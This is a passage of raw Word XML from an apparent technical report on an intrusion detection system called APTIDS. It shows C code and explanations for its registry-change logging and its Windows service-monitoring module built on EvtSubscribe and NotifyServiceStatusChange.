          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>, lpLastValueName);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//If the name of the value in the last position is different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//from the previous query</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wcscmp(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>lpLastValueName, achValue)) {</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getDateTime(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="6F008A"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>NULL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>, wchTime);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wcscpy(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>wchLogBuffer, wchTime);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L"[ALERT]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L"[REGISTRY]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 New value modified at Key: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wchLogKey);</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  --&gt;Value Name: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achValue);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  --&gt;Value Data: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(LPWSTR)lpValueData);</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WriteLog(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="6F008A"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>LOG_TYPE_REGISTRY</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>, wchLogBuffer);</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L"%s"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>, wchLogBuffer);</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memset(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">wchLogBuffer, 0, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>sizeof</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>(wchLogBuffer));</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C60196" w:rsidRDefault="004829A7" w:rsidP="004829A7">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w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002565A7" w:rsidRDefault="002565A7" w:rsidP="004829A7">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9B2BE7" w:rsidRDefault="009B2BE7" w:rsidP="009B2BE7">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="008F0F14" w:rsidRDefault="008F0F14">
      <w:pPr>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
          <w:color w:val="1F3763" w:themeColor="accent1" w:themeShade="7F"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="009B2BE7" w:rsidRDefault="008F0F14" w:rsidP="008F0F14">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="94" w:name="_Toc484963013"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Service Monitor Module’s source code</w:t>
      </w:r>
      <w:bookmarkEnd w:id="94"/>
    </w:p>
    <w:p w:rsidR="00054518" w:rsidRDefault="00054518" w:rsidP="008F0F14">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>APTIDS implements Service Monitoring module for identifying and capturing any anomalous behavior occurs to Windows Services. APTIDS calls “SvcChangeNotify” as an independent thread to perform service monitoring tasks.</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SvcChangeNotify(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>){</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EVT_HANDLE</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve"> subscriptionHandle;</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SC_HANDLE</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve"> scManagerHandle;</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notifyEventHandle;</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SERVICE_NOTIFYW</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve"> notifyBuffer;</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dwResult;</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hHeap;</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SECURITY_ATTRIBUTES</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve"> secAttribute;</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hHeap = </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>HeapCreate(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">0,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r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="2B91AF"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>CALLBACK_CONTEXT</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>), 0);</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r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="2B91AF"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>CALLBACK_CONTEXT</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve"> * pstCallbackContext </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w:t>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r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="2B91AF"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>CALLBACK_CONTEXT</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HeapAlloc(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">hHeap, </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sizeof</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>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r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="2B91AF"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>CALLBACK_CONTEXT</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>));</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8F0F14" w:rsidRDefault="00054518" w:rsidP="00F73C0C">
      <w:pPr>
        <w:pBdr>
          <w:top w:val="single" w:sz="4" w:space="1" w:color="auto"/>
          <w:left w:val="single" w:sz="4" w:space="4" w:color="auto"/>
          <w:bottom w:val="single" w:sz="4" w:space="1" w:color="auto"/>
          <w:right w:val="single" w:sz="4" w:space="4" w:color="auto"/>
        </w:pBdr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:tab/>
        <w:t>pstCallbackContext-&gt;wchLogBuffer = (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="2B91AF"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>LPWSTR</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>calloc(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="6F008A"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>MAX_BUFFER_LEN</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>, 1);</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002565A7" w:rsidRPr="008F0F14" w:rsidRDefault="002565A7" w:rsidP="00F73C0C">
      <w:pPr>
        <w:pBdr>
          <w:top w:val="single" w:sz="4" w:space="1" w:color="auto"/>
          <w:left w:val="single" w:sz="4" w:space="4" w:color="auto"/>
          <w:bottom w:val="single" w:sz="4" w:space="1" w:color="auto"/>
          <w:right w:val="single" w:sz="4" w:space="4" w:color="auto"/>
        </w:pBdr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="004829A7" w:rsidRDefault="00F73C0C" w:rsidP="004829A7">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>SvcChangeNotify defines some variables for its functionalities:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F73C0C" w:rsidRPr="00F73C0C" w:rsidRDefault="00F73C0C" w:rsidP="00F73C0C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">subscriptionHandle: An event subscription handle which is used for creating a subscription that </w:t>
      </w:r>
      <w:r w:rsidRPr="00F73C0C">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>will receive current and future events from a channel or log file that mat</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">ch the specified query criteria specifying in the calling function named “EvtSubcribe”. </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subscriptionHandle = </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>EvtSubscribe(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>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A31515"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>L"System"</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A31515"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>L"*[</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>System[</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>Provider[@Name='Service Control Manager']]]"</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SubscribeCallback,</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F4F4F"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>EvtSubscribeToFutureEvents</w:t>
      </w:r>
      <w:r w:rsidRPr="00F73C0C">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002565A7" w:rsidRDefault="002565A7"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F73C0C" w:rsidRDefault="00F73C0C" w:rsidP="00F73C0C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>EvtSubscribe is a Windows API used for creating a subscription, the channel in this context is “</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>System”  and</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> the XPath query is “*[System[Provider [@Name=’Service Control Manager’]]]” which indicates that this is a subscription for the Service Control Manager which is belong to the System.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F73C0C" w:rsidRDefault="00FC1E10" w:rsidP="00FC1E10">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>scManagerHandle: A handle for Service Control Manager.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FC1E10" w:rsidRDefault="00FC1E10" w:rsidP="00FC1E10">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>notifyEventHandle: An event handle for notifying change happening to SCM. This handle is used later by NotifyServiceStatusChange and WaitForSingle Object to capture SCM events.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FC1E10" w:rsidRDefault="00FC1E10" w:rsidP="00FC1E10">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">notifyBuffer: An object of the struct SERVICE_NOTIFYW which stores information for using in the functionalities of NotifyServiceStatusChange. notifyBuffer stores some essential information such as </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FC1E10" w:rsidRDefault="00FC1E10" w:rsidP="00FC1E10">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>A number indicating the version in use.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FC1E10" w:rsidRDefault="00FC1E10" w:rsidP="00FC1E10">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>A pointer to the callback function used for handling SCM events.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A90303" w:rsidRPr="00A90303" w:rsidRDefault="00FC1E10" w:rsidP="00A90303">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>A callback context which stores arguments for passing to the callback function.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A90303" w:rsidRDefault="00A90303" w:rsidP="002052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10"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>memset(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">&amp;notifyBuffer, 0, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>sizeof</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>(SERVICE_NOTIFYW));</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A90303" w:rsidRDefault="00A90303" w:rsidP="002052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10"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">notifyBuffer.dwVersion = </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="6F008A"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>SERVICE_NOTIFY_STATUS_CHANGE</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A90303" w:rsidRDefault="00A90303" w:rsidP="002052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10"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>notifyBuffer.pfnNotifyCallback = &amp;NotifyCallback;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A90303" w:rsidRDefault="00A90303" w:rsidP="002052C4">
      <w:pPr>
        <w:pBdr>
          <w:top w:val="single" w:sz="4" w:space="1" w:color="auto"/>
          <w:left w:val="single" w:sz="4" w:space="4" w:color="auto"/>
          <w:bottom w:val="single" w:sz="4" w:space="1" w:color="auto"/>
          <w:right w:val="single" w:sz="4" w:space="4" w:color="auto"/>
        </w:pBdr>
        <w:ind w:firstLine="710"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A90303">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>notifyBuffer.pContext = (</w:t>
      </w:r>
      <w:r w:rsidRPr="00A90303">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>struct</w:t>
      </w:r>
      <w:r w:rsidRPr="00A90303">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve"> CALLBACK_CONTEXT*) pstCallbackContext;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002565A7" w:rsidRPr="00A90303" w:rsidRDefault="002565A7" w:rsidP="002052C4">
      <w:pPr>
        <w:pBdr>
          <w:top w:val="single" w:sz="4" w:space="1" w:color="auto"/>
          <w:left w:val="single" w:sz="4" w:space="4" w:color="auto"/>
          <w:bottom w:val="single" w:sz="4" w:space="1" w:color="auto"/>
          <w:right w:val="single" w:sz="4" w:space="4" w:color="auto"/>
        </w:pBdr>
        <w:ind w:firstLine="710"/>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="002052C4" w:rsidRPr="002052C4" w:rsidRDefault="00A90303" w:rsidP="002052C4">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">secAttribute: An object of SECURITY_ATTRIBUTES struct </w:t>
      </w:r>
